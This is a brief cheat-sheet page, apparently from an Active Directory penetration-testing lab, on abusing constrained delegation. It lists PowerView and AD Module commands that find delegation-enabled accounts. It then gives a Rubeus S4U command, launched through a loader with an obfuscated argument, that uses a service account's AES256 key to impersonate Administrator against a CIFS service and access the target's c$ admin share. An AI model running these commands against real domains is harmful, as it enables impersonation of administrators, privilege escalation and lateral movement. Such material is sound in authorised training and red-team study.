Constrained Delegation
Domain Admin can allow a computer to impersonate a user or computer against a service of a machine.
Last updated
# PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo# ArgSplit for "s4u"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
klistC:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$